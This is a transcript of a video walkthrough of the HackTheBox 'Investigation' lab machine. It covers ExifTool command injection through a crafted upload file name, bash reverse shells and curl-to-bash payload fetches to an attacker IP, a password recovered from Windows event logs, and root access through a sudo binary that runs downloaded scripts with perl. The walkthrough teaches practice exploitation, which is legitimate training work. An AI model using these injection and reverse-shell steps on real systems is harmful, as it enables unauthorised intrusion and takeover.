HackTheBox - Investigation

IppSec · Beginner ·🔐 Cybersecurity ·3y ago

Key Takeaways

The video demonstrates a cybersecurity investigation using various tools such as nmap, gobuster, and ExifTool to exploit vulnerabilities and gain access to a system. It covers topics such as reconnaissance, web application security, and file upload vulnerabilities.

Full Transcript

what's going on YouTube this is ipzac me doing investigation from hack the box which starts off with a recent vulnerability and exif Tool the cve is from last year and you may think exiftool is just a binary written in like C or something but really it's a pro script and I say that because there's a specific vulnerability maybe not vulnerability a specific Pearl feature that many developers don't really think about when you open things in Pearl if it begins with a pipe character it instead of opening for read it executes the file and that can lead to code execution in a lot of cases I highlight a talk from black cat eight years ago called Pearl Jam which is when I first found out about this I guess feature once you get code execution on the box there's an email that points you to a Windows Event log we'll use chainsaw to find some anomalies in the log files that leads us to logging into the box and once we're in there's just a simple binary that will do a lot of like ghidra things to make the decompile output pretty so let's just jump in as always we start with and map so Dash SC for default scripts as V enumerate versions OA output all formats playing the nmap directory and call it investigation then the IP address of 10 10 11.197 this can take some time to run so I've already ran it looking at the results we have just two ports open the first one is SSH on Port 22 and its Banner tells us it's an Ubuntu Server we also have HTTP on Port 80. it's Banner tells us it's running Apache httpd and we also have a message saying it redirects us to e forensics.htb so if we went to a web browser and went to 10 10 11 197 we get a big old uh we can't find the server because we haven't added it to our host file yet so let's do this so we have DNS resolution 10 10 11 197 e forensics.htb and then refresh the page and we get to the server before we do anything I'm just going to run a go Buster so gobuster dir Dash U and then Dash W for word list up seclist Discovery web content raft small words dot text and I also wanted to see if this is like index.html it looks like it may be um that's a weird error do we just get phone not found when it ends in PHP that is actually bizarre um so if we specify like test.txt let's see what does this give us I just set to burp sweet we get it not found but if we do test.php we get file not found so I'm guessing this is going to a different web server something's happening here let's see what does the server header say apache2441 okay let's is the same I have no idea why the 404 page changes based upon um the extension but I'm gonna guess it is a PHP web server since there's something specific to PHP going on here so that just means I do Dash X PHP and I'm just going to call this root dot go Buster and we will keep looking at this page that is definitely odd behavior so let's go back to the page and we can click around these links just appear to go to the page we have some reviews of customers nothing really interesting there um chain of custody nothing talk about really the service if we go to free services I think I clicked them for e-services I did um this page I guess that's weird how the header is changing but we do have services.html and and upload form it says upload an image file and we provide a detailed forensic analysis at this time we can only process jpeg images so let's find a JPEG on a box I'm going to do locate um we also have upload.php but let's do locate dash of regular expression and I'm going to say dot JPEG and then the dollar sign so we find everything that ends in jpeg and I'm just going to grab the last one I have here we can copy it go to browse let's do hdb investigation go to the image and then burp sweet intercept on upload I'm going to send this to repeater tab so we have it there but also I'm just going to forward it so we can see what it looks like and we have xsser jpeg has been uploaded analysis can be viewed here so let's view this analysis and we just get a bunch of exacto data the URL is xsr xss or jpeg.txt so what I want to do is see if I can find the jpeg file because if we can then we can potentially like poison the file upload add a PHP extension and get code execution right so let's just go jpg.jpg uh file not found let's just do the exact file name we had not found and we have analyzed images here so what if I do images does this exist 404 not found maybe uploads is another common one 404 not found we can wait for a go Buster to finish maybe that will tell us something in the meantime let's poke your attention to exit tool version number 12.37 so let's just see when this tool was released whenever you get a version number always interested to see like release dates and if there's known vulnerabilities so if we look at the version history 12.37 it doesn't look like it's on this page which means it's probably going to be old I'm going to go to history of older versions 1237 we see December 8th 2021 so this is definitely going to be um something interesting so let's Google Now exif tool 1237 rce helps if I spell rce correctly and we have something right here on the GitHub page one sec cyber and this is I'm talking about a mime type injection let's see I went back because this says 12.23 and we have 12.37 um 12.23 ancient history let's see if we say exploit instead of rce we get 12.38 there so this one looks a bit better and it says exiptool versions less than 12.38 or vulnerable to command ejection through a crafted file name and it's using the pipe character and in this vulnerability um this is going to be something really weird it's um how Pearl kind of works we'll get into that after we show it but the vulnerability itself is saying if it is a gzip file it's going to use Pearl's special execute operator to execute um gzip and then do something with it and then in this up open um we're checking if the mode is pipe which means execute and if it's not it'll set it to this which is read and this probably makes no sense to you whatsoever without knowing like the backstory so there are two talks that I really like about this um it's like eight years ago which shows how old this vulnerability is um it's mainly affected like Pearl CGI modules because that's the most common one but we still see things all the time I guess and um just things but if you go YouTube The Pearl Jam Black Hat and make sure you spell black hat as one word these two talks from Daniel Rubin are really really good about this vulnerability he goes into a lot more of the type confusion thing but we'll just go and show it right so let's open test.pl and create a Perl script to just read a file so let's do um the working directory Where We Are we'll call this and then we will Echo Please Subscribe into the file actually um let's put an actual shell script here so we'll do bin bash and ID I don't know if it needs to be executable we won't make it so we'll call it the file and then we want to open a file Handler so we'll do open file Handler and then the file and after that we just want to Loop over this so we'll say um line is equal to the file Handler and we print line I think this is valid Pearl we run it we just get the contents of the file that is what you would expect now Pearl has um operators to open a file normally in like C you would specify how you want to open the file I know in C it goes after the file name and pearl it goes before it but this is where you'd say like read right and if we do that and execute it it says unknown open mode r um and the reason why it does that is because pearls read is that angle bracket so we can save this run test dot Pearl again and now it reads it there is a second place you can put these operators you can just put it in like the first character of the file path and it magically knows that um so the really odd operator is a pipe if you do a pipe it's going to execute it so all I did is change that to the pipe and let's see we didn't get anything out of it I did not expect that um let's see edit anyways oh um V the file I wanted to make this executable there we go yep that's it the file or script has to be executable so changing the mode is what leads us to the code execution and I think this can also be at the end let's see yeah so it can be at the front or the back um the other operator let's just CP the file to the file till day for a backup there is I wonder if I do it here we run it and I catch the file I'm guessing the file is going to be blank no it's not um if I put that operator here Pearl cat the file and now the file got erased so what happened there is this operator is how we open in right mode and because we didn't write append it erased the file because we just equivalently did um Echo this to the file right if we Google let's see Pearl file open operators there's probably going to be a page here let's go to the Pearl documentation what explains it because there's a lot um this one's talking about open for write append this is read and write the plus and then the less than sign so there's a bunch of just special operators for some reason Pro doesn't make it in um ASCII letters it just does symbols and this one's interesting because you can also do the operators as a second thing as I said right but just a standard pipe no longer is valid it gets unknown operator mode this one is um this so that's going to be the short example of this exploit and how it works if we want we can look at the patch real quick let's see if I can find it so in this we're setting the mode this if then statement is just saying if it ends in pipe then make it nothing I think I'm not exactly sure but if we look at the patch let's see except tool oh I think I may have um forgot to mention exif tool you may think is a um like binary character than C or something like that but it's really a pearl script so um that's why we went into the in-depth thing of pearl where did I go to exif tool GitHub search on Google okay and we want to find this line I can probably just search for this right um no oh because it's patched right issues is this gonna find it no where's the file um command execution lib image exiftool.pm so we're in exif tool lib was an image a file image except tool.pm and let's see mode it's going to move this here we want to search for this string probably so this is where the vulnerability was and all they did is add a mode for this self trust pipe and this self trust pipe gets set when it's doing a gzip file when they intended to use this mode so because this didn't exist before that's why the code execution happened but um yeah so let's finally just exploit this right so if we go back to the upload we can go to the file name and it says if the file ends in a pipe then we can execute so I'm just going to do um sleep one and then end this in a pipe and it's taking a sweet time we have 1 300 milliseconds if I do sleep two hopefully it says 2300 milliseconds and that will confirm code execution we can do sleep three and go up to 30 seconds now the weird thing you may be thinking is why does it have to end in a pipe didn't we show all the examples of it beginning with a pipe and that is again how it does this is this mode gets set upon the last character being a pipe and then when it returns it moves that mode to the beginning of the thing so that's why we're focused on the last character not the first character but because we have this let's just try getting into code execution so we can say bash Dash C bash Dash I Dev TCP 10 10 14 8 9001 like this and let's open up netcat run it and we don't get anything I'm gonna guess this is just because of like special characters or something so let's try curling so if I curl 10 10 14 8 9001 it's hung we get a request so we know we have code execution this way I'm going to create a script so let's go into www and I'm just going to do shell.sh so again bin bash bash Dash I Dev TCP 10 10 14 8 9001 and the reason why I'm not doing a bash Dash C because I'm telling the script to execute and Bash so no matter what I'm gonna be in Bash um the reason why I keep saying bash is this Dev TCP thing is a bashism if it was in sh or a dash or a different shell it may not have um this file or this magical file that's just a network socket so let's do sudo python3 Dash M http dot server I'm gonna listen on 80. so let's do shell.sh and then Dash o temp shell.sh and we didn't get a request let's get rid of this Dash l it's still nothing we just do 10 10 14 8 we get a request so I'm thinking a slash is a bad character I wonder if we have to URL encode the slash so let's do um where's convert convert selection URL encode all characters will this work no so we got to make our exploit work without slashes we can just probably move shell.sh so if I let this server up and we curl localhost we get a directory listing if I rename show.sh to index.html car localhost now I'm going to get that shell so let's just do pipe to bash and see what happens I'm guessing maybe pipe's a bad character because we're using pipe for code execution here but I don't know let's just try this so run it and we get a hit and a shell so apparently we can get that working now one of the things that is really sticking out to me is um when uploads directory and I specifically looked for uploads and we didn't find it additionally after uploads it looks like we got a Epoch time stamp I do lsla we see this is the command I ran the file name so this is probably what it downloaded if we try to cut it I have no idea what that is oh that's our file upload the content's down here so that is a jpeg um I can't clear the screen so let's just do a Python 3 Dash C input PTY pty.spawn Ben Bash export term is equal to X term and then stty Dash a rose 31 columns 121. so sdty Rose 31 calls 121 export term is equal to X term oh I need sdty raw minus Echo FG there we go now we can clear the screen so let's dig into exactly why we can't find this I do find dot dash type f wait oh not Dash F type f here's a list of all the files we uploaded here's xsser.jpg but still nothing if I go up out of the uploads directory we're not in the web directory so it looks like there's maybe a virtual host or it just writes outside of HTML so that's why we can't access uploads if I go in HTML we have the simple script and there's only an upload.php there's no like database or anything like that to pillage we could look at upload.php but really um it's not going to really be that interesting because it's just a standard file upload right here we see where it's declaring the folder dub dub dub uploads folder and here's where it's running exiftool so what else is there to do we can go to slash home and see if I go into s Morton's directory we can't we get a permission denied so let us run Lin peas and then um CF lnps points anything out so I'm just going to Google Lin P's GitHub so we can download the latest copy and this tool changes so frequently that's why I always just download a new copy when I want to run it we can see 13 hours ago we have an update um maybe it's just like rebuilding every when's the last commit oh 14 hours ago so it does change pretty frequently did I download or do that okay limpy saved let's move it into dub dub dub my web server should still be running so let's just curl 10 10 14 8 slash Lin P's dot sh pipe it over to bash and I'm going to pause the video and we'll let this finish okay now that Lin peas is done running we can just go to the top and take a look at what is happening on this box the pseudo version 1.8.31 I don't believe that is um injectable I think Lin P's just always highlights the version doesn't mean it's exploitable looking down the Linux exploit suggestor I don't have a lot of great results with this if I get really stuck that's when I start trying these type of things but um I gently ignore it until I look at like the first pass second pass with winpies and once I'm almost positive there's no other way that's when I'll start looking at things like that um this looks like it may be a reverse shell we can see how suspicious it looks like this call tree we have a CD going in Pearl running all this bash script all that stuff that is somewhat fishy right we have parent process ID cron jobs and this is highlighting and red and yellow which is odd but we do have a Cron job so we're going to write date to use a local investigation analyze log and then um clear the contents so let's just go into this directory because this is odd it's also running every five minutes so we should see information on analyze login it is empty which is odd if I do contact L I'm just going to do tail dash one so we can have a clear thought of what's going on here we should see it right here so we write to analyze log we write clearing folders to analyze log and then we remove the uploads directory and this and oddly enough um this directory doesn't get removed every five minutes right because it's been more than five minutes and we still have all of our files and it's because everything's doing and and and we have a permission error I'm guessing we can't right there nope we can we have read write on this directory so if we Echo one to analyze log we get operation not permitted this generally means either SC Linux or the actual file is marked immutable so if I do LS attr to list extended attributes of this we can see the I flag so it's immutable so we can't write to it and I think only root can set this flag um so we can't even though we own it we can't um remove that permission so that's why we can't access this but there is this file this Windows Event log for analysis if we do a less against it uh it's just a bunch of junk so I'm going to copy this file back to our box so let's do um nclvnp 9001 and we're going to direct this to um what's the file name uh I'll call it email.msg and then we can cat oh use the redirector so let's do NC 10 10 14 8 9001 and we're going to send it this file I'm using it this way just because we talked a lot about redirectors with the Pearl thing but this should send the file over to me I'm going to control C this because it doesn't um kill the NC right away I wonder if I did let's just do a second file instead of doing the redirect I wonder if I cat it and pipe does it then I know there's a magical way we can have it close the connection afterwards but that does not appear to do it either so I'm just delaying the second file we created for saving confusion we can md5 Summit on both ends and we have the file so we could either open this up in like Outlook to read it but we can also use MSG convert and if you don't have this let's see MSG convert apt it's part of like some weird lib um lib email Outlook lib email here's the command you want to run lib email Outlook message Pearl which is funny um this may be even vulnerable to that file open thing let's just do message convert email Dot message and we have it so it converted email message to email dot EML for email.email let's just execute this or not execute um open it for reading and we can see some names so we have Steve Morton Thomas Jones and if we look at the Box we can't Etsy past WD and I'm going to grab everything that ends in sh we can see there is S Morton so S Morton appears to be the administrator I'm guessing Thomas Jones maybe developer or something I don't know yet so it goes hi Steve can you look through these logs to see if an analyst have been logging on to the inspection terminal I'm concerned that the moving data on production without following a data transfer procedures regards Tom so maybe Tom is the security admin he's like the data transfer officer or something and then we have this base64 content which is just the email and RTF form and then we have an event log zip and that's the end of the file so we can open this in an email application but I'm going to be lazy and I'm just going to delete everything up to the base64 and it's worth noting um it's evtx-logs.zip so we're dealing with uh ZIP data so now we just have the um base64 I'm going to call this EVT logs dot zip Dot b64. so now we save that and we look at it we just have base64 so we can cat and then base64-d and we get invalid input it does start going some data before it gives us this invalid input if we xxd we can see there's the gzip header but we can't d uh unzip the whole thing and I believe this is just going to be some type of um line breaking issue so if we do DOS to Unix against this file actually let's copy this beforehand real quick so I'm going to run dos to Unix on EVD logs and it converts it to Unix format and now we can base64 decode it no problem so I'm going to call this EVT logs.zip and let's see exactly what the difference is between the two so if I do head Dash 2 on evtlogs dot base64 we can see to the eyeball these things look the same right so let's just pipe one two xxd and we'll pipe that second one to xxd as well and if we follow this it's definitely different one has zero d0a the other just has zero a we can see the same thing here zero d0 a um let's just search for zero a so it's how it's ending line breaks 0d is a character turn I believe let's just search this 0d yes is a carriage return and then 0 a is going to be a line break we have it right here so that's all we had to do to get this in base64 format so we can unzip event logs and it gives us a security.evtx file if we run file against it we see it's a Microsoft Windows Event log and these are always just a pain to parse manually I guess you could just go to Windows import it and use Event Viewer to search through it but Event Viewer is also a horrible way to search logs so what I'm going to do is use an application called chainsaw which sounds weird but it lets us all through logs I guess rapidly search and let's see let's just go to releases and I'm going to download the all platforms rules and examples so let's move downloads chainsaw here and then we can just unzip it so chainsaw like this we go into chainsaw we have a few programs so we got it for Mac we got for Windows and we got um gnu and muscle so if we chmod plus X and execute the gnu we're gonna have some libsy errors so I'm going to go over to the muscle because I think this statically compiles it um let's see Star Linux star no it's probably not static compile because it's still the same size but the muscle works better or works on more things so we can do dot slash and execute this and it runs so I'm going to rename it to just chainsaw so we can quickly work with it now the cool thing with chainsaw is it gives us a bunch of examples so these are all event logs that we could search through just to play with it right but we have our own so I'm going to call a new folder investigation and let's move the security.evtx file there and if we run chainsaw we have the hunt feature and we have a search feature so the search will let us like search for Strings event codes things like that the Hunt is going to be like magical I guess so I'm going to run chains on by magical I just mean um it does a lot of the work for us so I can do Dash R for rules and if I go into the rules folder he was the email was concerned about um like x-filling data I think or copying things off so I'm going to search the lateral movements and this is going to run there's rules and we don't have any detections we could just do all the rules and run like this way and it looks like we have a user got added to a group um administrators and then we also have an event log clear ID so this alone is really fishy of S Morton clearing the event logs I don't know why you would do that but he did right so that doesn't really help us we can go back to hunt and let's do hunt Dash h we'll just go back to the example commands and we can do Dash Sigma and we do the mappings and rules and this is going to give us a lot of output so I'm going to put this to Sigma dot out because um it gives us way too much data and it's actually not going to be that useful to us but I did want to show it so if you just look at Sigma dot out we can see let's do less dash s real quick so we kill line breaking user added to Group Security log cleared potential defense evasion via raw disk access I don't know exactly um what this event was but we see MMC being used as Morton so it's just highlighting a bunch of things that are um fishy a lot of just raw disk access by various tools not sure how it detects that I'm guessing we could um copy this let's see crap Dash R for the string um we'll just go in the sigma directory right so we have how it does process creation things like that I'm not exactly sure how this works maybe this deserves its own video but you can look at a sigma rule and see how it works and also read description detects the execution of a rename binary often used by attackers this is leveraging sysmon I don't think sysmon was installed in this box so it's probably not that one right um maybe this rule it's a title description same description but slightly different um things anyways let's get out of doing all this Sigma stuff I recommend you play it with yourself especially because you have the attack samples here that you can do um the one thing I always look at is event IDs and specifically like 4624 and 4625 that is a successful login and failures so we can do dot slash chainsaw search Dash T event system event ID uh 4624 and then the folder where it goes I'm going to say dash dash Json so we I'll put everything in Json and we should just do a file so successful logins dot Json and I'm also going to do 4625 for failed logins.json okay now we can just cat successful logins pipe it over to JQ and get flooded with information so I want to sort this and I'm going to just look at the first 10 files or 10 lines and I want to get into event ID or invent data right so since it begins with the square bracket a list I'm just going to JQ and then the list so we can see we have entered that object now the next object is event and then event data so I'm going to do dot event and then dot event data so now I'm into the event data I'm going to add 30 lines to head maybe 25 okay and the data I want to get probably is let's see process name or login process name process name and probably the target domain name and Target username so those are interesting fields to me so to do that I put this in single quotes and then do a pipe because this pipe's going to essentially go into that and then I can select each thing I want and JQ syntax is really stupid I do a Escape parenthesis and then period And what I want so I want log on process name and it looks like for some reason it has bases there so I'm not going to put spaces in we can do the next one is just process name then the next thing I want is going to be Target domain name so we can do T Target domain name and then I'm going to do a double backslash because I just want to print a backslash and then another one because it's the parenthesis and we'll do Target username okay and then the other thing is all of these parentheses or things need to be within double quotes so you have the single quote the data then pipe double quote the search and it shouldn't be no what was it log on I'm just going to copy and paste because I probably have a typo there we go so now we have the login process name the binary it came from and then a user we can do a sort Dash U to show us only uniques and everything here isn't really that interesting we do have quite a few users logging in but that's not really interesting so let's try the same exact thing with the failed logins and we have um L Monroe failing hm rally failing and then we also have this and what this is is a case of someone accidentally typing their username typing their password into the username which sounds really silly but anyone that's ever set up like centralized logging at an Enterprise like Splunk elastic um any type of logging you know how common this is so um we should try this password is what I'm saying because someone accidentally typed that and I'm gonna do um Dash R for raw because we see it had double backslashes now it just has one that's just because it escaped the backslash to qualify or be like Json um compatible there's no domain here so that's why this backslash exists because remember I did Target domain and then backslash something if we just do a space we see domain is blank maybe a better way to do this would be tabs can I just do backslash T everywhere I'm curious hey that looks better so um backslash team may be better to separate the parentheses and we have this um thing the only user on this box we established already was S Morton so I'm just going to do a good old Su on S Morton login and we got in as that user if I do a pseudo-l we can see S Morton can execute user bin binary because there's been so many um like Pearl challenges on this box I'm just gonna do a file and we see it's a 64-bit executable if we pseudo to execute it it just says exiting we don't know exactly what happened here so let's copy this binary back to a box so I'm going to do nclvnp 9001 pipe it to Binary and we can NC 10 10 14 8 9001 and send the binary back to us connection give it a second okay md5 some binary md5 sum the binary it looks the same so I'm happy with that actually we had the binary and chainsaws directory let's just copy it to a parent directory and now we can just run gidra so we do ghidra guidra run on the binary and once this opens oh we don't specify the binary name we just open ghidra and then we can create a project I'll just call it investigation and then click the little uh dragon and once this opens press I to import a binary coincidentally the binary's name is also named binary and then we'll just do all the default um filtering right so analyze it we're not filtering analyzations and there's two things we could do so the first thing is we could just go to the exports and look at Main and we get the code this way the other thing we could have done is what I normally do when I do reversing is let's see if we go here do the sudo command we see the binary has the string exiting so I gently go to search for Strings and then we can search and filter it for exit and we can see where the string is I know the assembly is a bit small print it's always a pain to make this one bigger but we see four cross references you can also click right click here and do references show references to address and see it here but if you just click on one of them it brings you to the code where it actually does the load effective address to load that string into memory and you can highlight it and see where it's being used I highly adjustable above the call so we see it used right at the start of Main now this code could be intimidating there's some things we could do to um make it a bit easier whenever you call Main you call it with two parameters you call it with ERG C and ARG V and ERG V is really just a list of pointers how it's done here is just a single pointer let's see if we can explain that a bit better by opening this up in GDB so let's do CH mod plus X binary GDB dot slash binary and they're going to set a breakpoint on Main and then we'll just run it with two arguments I'm going to run it with ipsec and please subscribe now the calling Convention of x64 puts things in registers right I want to say RDI is the first argument and RSI would be the second one let's see where is RDI first argument is set to three and then RSI this is going to be the second argument if you're confused by that you can always just Google like x64 calling convention and when I say this brings us up to like an ired team um page and this is a really good blog post that explains it how arguments are passed so we see the first arguments RDI second argument RSI then RDX whatever so since we broke on Main those registers haven't been changed yet so they're still pointed to the right thing and it's set to three because remember I said it's a list of pointers at RSI if we go into the code what makes it confusing for M2 is where the org V starts and we see it adding 10 here now 10 is really 16. we can see um since I left my mouse over it it says 10x is equal to 16 decimal this is going to mean it goes to the second argument a really third argument because the first argument when you call a program is the name of the binary itself then the first one is the first argument and here we have the second right memory addresses are eight bytes long so that's why we're at 16 here down here we have it using param two plus eight so this is getting that second one so again the reason why we pass argz the number of pointers and then the start of the pointer is just so the program knows like memory stack allocation things right because if we didn't then it wouldn't know when ARG V is ending so if we just do X slash GX this is going to give us a bunch of memory addresses on RSI we'll do four we see three strings and then an all byte so if we do X slash S on this is going to be the name of the program this is the very first thing in arc V then the second pointer on the stack I'm saying stat the second pointer here is going to be ipsec the first argument we passed it and then finally we have please subscribe so the second argument and I want to say things like the environment variables come after um this let's just do seven right so we have the null byte terminating this I want to say this is going to be environment variables let's just check yeah shell is equal to this is this going to be a different one session manager so when you start debugging enough programs this starts making sense for you but hopefully that made sense so what I'm going to do here is going to click on param one I'm just going to call it rxc and I did I hit L to rename so now we can see if urgency is equal or not equal to 3 then it prints exiting so it's easier to read already I'm going to name this ARG V but it still does this ERG V plus 10. we want to retype this so I'm going to right click do retype variable and I want to change it it's not really a long um I'm going to give it care and two stars and now GDB or not GDB um geja is putting that in a format that I'm more comfortable with right so let's keep going down if Arc C is not three we exit so we know we need two arguments um the first one is always going to be the file name so then we do a call to git uid and check it so I'm going to rename var1 to be uid so we make sure the uid is set to zero and now we have either one and this is just equal to this string so this is a password I guess so the last argument needs to be this so we're going to call this PW and as I do that I noticed um a lot of things change down here so I'm going to control Z to undo that change I'm just going to call this RDS for result because it keeps reusing this um so we have that string then we do a part we're going to open right binary and this is every now and then sometimes GDB will give me like that underscore or something here and sometimes it presses it to be characters to show you what I mean if I go to where it's loading this right here let's see can I do go to this location and I'm just going to say this is you long so sometimes you'll see like an F open and if you know what F open is you know like okay well I Gotta Give it the file name and then I give it the mode and you see it's set to something you don't recognize I recommend going into the assembly on the left where that is double clicking and then you can change the type to be whatever you want in this case I'm just doing care and we see it goes back to WB so I'm not sure if that's going to be the case for you um that is a handy tidbit when you see it saying things like data or something's wrong so now we have U of R1 is equal to curl easy a net and I'm just going to call this H curl for a handle curl because this looks like it's just saving curls memory address here and then we're setting a few options so 2712 ARG V I'm going to copy this and then we're going to do 0x2712 curl and if we go to the first result we see that is um Carl opt URL so this is just I guess um if we had symbols or something like that we could resolve all these names I wonder if Ida would automatically resolve this for us um let's let's create our own file to do this so I'm going to create a a new structure in C to get all these variables and I'm just going to Google let's see if I do curl opt codes has someone done the research for me they have so if I go to this page I'm going to copy all of this and let's just V curl up dots we'll do h paste this and then what I want to do is make an a new struct so we'll do a new uh curl up like this and then inside of an a new it doesn't use semicolons it uses commas so I'm going to use said to replace all semicolons with commas there we go and then let's just close that off and put a semicolon so we can save that file and now when we go in ghidra we're in the data type manager I'm going to type curl and we don't have a data type so I'm going to do file and we're going to press C source and I'm going to create a new thing so I'm going to I wish it was like a new object here I don't know if there is um I already did it once before but let's just do a save profile to new name I'm going to call it what I want so we'll do curl video and then we can delete everything it's doing here because this is a new profile right and we can just add our file so I'm going to add um let's see ipsec hdb investigation curl op.h I'm going to parse to program yes uh sure okay and now you can see my data type manager so I was searching for Co already has it so what I want to do is redefine um this signature because right now it's just void so I'm gonna do a pointer and then we're going to say the second option is a new structure and then last one is just going to be another pointer I think and now it has magically pressed everything so we see the curl op ERG V1 so this is going to be a URL um so the first argument is a URL then we're going to write it to a file and fail on error is set to one so I'm assuming if the file um if it doesn't access the file maybe the program closes or something like that I don't know exactly what fail on error does we could easily search this now that we have the human readable name so just curl fail on error and see what this says curl opt fail on error so a long parameter set to one tells the library to fail the request if HTTP code returned is equal to or larger than 400 so the status code is over 400 then it's going to fail default action would be to return the page normally so down here we have result is equal to zero so this means um if the page did not fail then we're going to do all these things so if the status code is under 400 this will be set to zero and we're going to do a printf and we're putting ARG V2 on printf which is the file name so I'm going to rename this to fname because after we do that we're just using Malik to write to the variable and now we can do another print f oh this time on purl and then the file name so we're doing Pearl dot slash fname and fname is the password and then we're closing and eventually we do set uid and run system against this so this will be um execute Pearl so essentially what this appears to do is um go to org V1 it's a URL download that to a file name named this string and then execute it with the Purl binary so what we can do is let's see if we just sudo um user bin binary it says exiting so I'm going to give it the URL of http 101014 8. and we give it the password wait it uses Pearl to execute huh so I thought we'd actually have to write a Perl script but apparently if you Purl a binary it just executes it is Pearl just like a low bin let's see um let's do which who am I is it just bash scripts or is it all binaries Pearl user bin who am I so I guess it's just bash scripts um Pearl will execute shell scripts okay um today I learned but I guess if we just do ncovnp 9001 and execute it oh I stopped my web server stupid me run it ncovnp 9001 and run this it's going to hit our web server which sends it a shell script which saves to this file name which then gets executed boom and we are root so interesting enough this file still exists and we're in home S Morton um free cat root root dot text so I'm noticing there's a second vulnerability here um we could download against our web server right but it looks like we probably can overwrite this binary name so what I want to do is get a second shell to this box so let's just we can do let's see failed copy this password then SSH S Morton at 10 10 11 197. okay so we just have user.txt here I'm going to stand up a HTTP server here and run sudo against this so until I kill this HTTP request um it's going to have this file open the LD whatever right so now if I do an LS we have the file it doesn't contain anything because we haven't responded to it I kill the request the program's going to leave the file there I thought it would clean it up um oh if the result is equal to zero then it goes down here and eventually it deletes it but um I guess it just doesn't delete it if the HTTP server fails but okay it would be easier for us now to explain what we can do because it's owned by root we can't write to it directly so if we write please subscribe to this file we get permission denied so what we could do is move this file because we own the directory it exists in right so if I move LD to LD and I'll do the squiggly now this file doesn't exist so this will allow us to now write to this file and we can put anything here to be executed by Pearl at least that's the plan so what I'm going to do is create a script we'll do test.sh and we'll do bin Bash and I'm going to touch slash temp slash please subscribe if I do an lsla on temp Please Subscribe it doesn't exist right so now let's see we can do V loop.sh I'm gonna do a while I think this do and CP test dot wait what I want to do we want to move this to that and then cptest.sh to this done so what we just did is create a script to constantly move this file to the backup and then copy test.sh over top of it okay so if I fast loop yes let's run a web server I'm going to run this pseudo command again it said running I don't get that error of it trying to send me a reverse shell so let's now do that same LS command on Please Subscribe and we see it exist with root owning it so we just exploited a race condition in this which I guess would have been helpful if the binary was hard coded to go to its own web server right but since we could control the web server we could write any content we wanted we didn't even need to do that race condition so hopefully that all makes sense take care guys and I will see you all next time

Original Description

00:00 - Introduction 01:00 - Start of nmap 02:00 - Start of gobuster 04:00 - Discovering an upload form, looking for where things get uploaded 05:50 - The upload gives us ExifTool output, including the version number to show it is vulnerable to CVE-2022-23935 08:11 - You should really watch "The Perl Jam" 08:40 - Showing the weird syntax of perl's file open and how | leads to RCE 16:15 - Back to the box, exploiting and getitng a shell 20:00 - Reverse shell returned, looking at the uploaded files 22:35 - Running LinPEAS to discover a cron 27:00 - There's an outlook email message with an attachment. Copying it then converting to eml format and extracting the file 32:45 - The file was an windows event log. Using Chainsaw to search through the logs 38:30 - Using Chainsaw and JQ to parse the Successful and Failed logins 42:25 - In the failed logins field, there's a password as a username and logging in as smorton 44:35 - There's a binary on this box, copying it to us and opening in Ghidra 45:30 - Start of reversing, just showing strings and finding out where the get loaded in the program 47:00 - Running the binary in GDB and showing how arguments work, then renaming and retyping variables to have decompiled output make more sense 51:30 - Retyping done, renaming a few variables to make things easier to read 53:45 - Cleaning up the curl_easy_setopt, code by creating an enum in C then using Ghidra to "Parse C Source" 59:20 - Now that the code is cleaned up, it is obvious the program executes perl scripts... Funny thing is the perl binary can execute non-perl scripts 1:01:05 - Showing there is also a race condition in the binary because the curl downloads to CWD and even thoe its owned by root we can rename it and take control over the file
Watch on YouTube ↗ (saves to browser)
Sign in to unlock AI tutor explanation · ⚡30

Playlist

Uploads from IppSec · IppSec · 0 of 60

← Previous Next →
1 HHC2016 - Analytics
HHC2016 - Analytics
IppSec
2 HackTheBox - October
HackTheBox - October
IppSec
3 HackTheBox - Arctic
HackTheBox - Arctic
IppSec
4 HackTheBox - Brainfuck
HackTheBox - Brainfuck
IppSec
5 HackTheBox - Bank
HackTheBox - Bank
IppSec
6 HackTheBox - Joker
HackTheBox - Joker
IppSec
7 HackTheBox - Lazy
HackTheBox - Lazy
IppSec
8 Camp CTF 2015 - Bitterman
Camp CTF 2015 - Bitterman
IppSec
9 HackTheBox - Devel
HackTheBox - Devel
IppSec
10 Reversing Malicious Office Document (Macro) Emotet(?)
Reversing Malicious Office Document (Macro) Emotet(?)
IppSec
11 HackTheBox - Granny and Grandpa
HackTheBox - Granny and Grandpa
IppSec
12 HackTheBox - Pivoting Update: Granny and Grandpa
HackTheBox - Pivoting Update: Granny and Grandpa
IppSec
13 HackTheBox - Optimum
HackTheBox - Optimum
IppSec
14 HackTheBox - Charon
HackTheBox - Charon
IppSec
15 HackTheBox - Sneaky
HackTheBox - Sneaky
IppSec
16 HackTheBox - Holiday
HackTheBox - Holiday
IppSec
17 HackTheBox - Europa
HackTheBox - Europa
IppSec
18 Introduction to tmux
Introduction to tmux
IppSec
19 HackTheBox - Blocky
HackTheBox - Blocky
IppSec
20 HackTheBox - Nineveh
HackTheBox - Nineveh
IppSec
21 HackTheBox - Jail
HackTheBox - Jail
IppSec
22 HackTheBox - Blue
HackTheBox - Blue
IppSec
23 HackTheBox - Calamity
HackTheBox - Calamity
IppSec
24 HackTheBox - Shrek
HackTheBox - Shrek
IppSec
25 HackTheBox - Mirai
HackTheBox - Mirai
IppSec
26 HackTheBox - Shocker
HackTheBox - Shocker
IppSec
27 HackTheBox - Mantis
HackTheBox - Mantis
IppSec
28 HackTheBox - Node
HackTheBox - Node
IppSec
29 HackTheBox - Kotarak
HackTheBox - Kotarak
IppSec
30 HackTheBox - Enterprise
HackTheBox - Enterprise
IppSec
31 HackTheBox - Sense
HackTheBox - Sense
IppSec
32 HackTheBox - Minion
HackTheBox - Minion
IppSec
33 VulnHub - Sokar
VulnHub - Sokar
IppSec
34 VulnHub - Pinkys Palace v2
VulnHub - Pinkys Palace v2
IppSec
35 HackTheBox - Inception
HackTheBox - Inception
IppSec
36 Vulnhub - Trollcave 1.2
Vulnhub - Trollcave 1.2
IppSec
37 HackTheBox - Ariekei
HackTheBox - Ariekei
IppSec
38 HackTheBox - Flux Capacitor
HackTheBox - Flux Capacitor
IppSec
39 HackTheBox - Jeeves
HackTheBox - Jeeves
IppSec
40 HackTheBox - Tally
HackTheBox - Tally
IppSec
41 HackTheBox - CrimeStoppers
HackTheBox - CrimeStoppers
IppSec
42 HackTheBox - Fulcrum
HackTheBox - Fulcrum
IppSec
43 HackTheBox - Chatterbox
HackTheBox - Chatterbox
IppSec
44 HackTheBox - Falafel
HackTheBox - Falafel
IppSec
45 How To Create Empire Modules
How To Create Empire Modules
IppSec
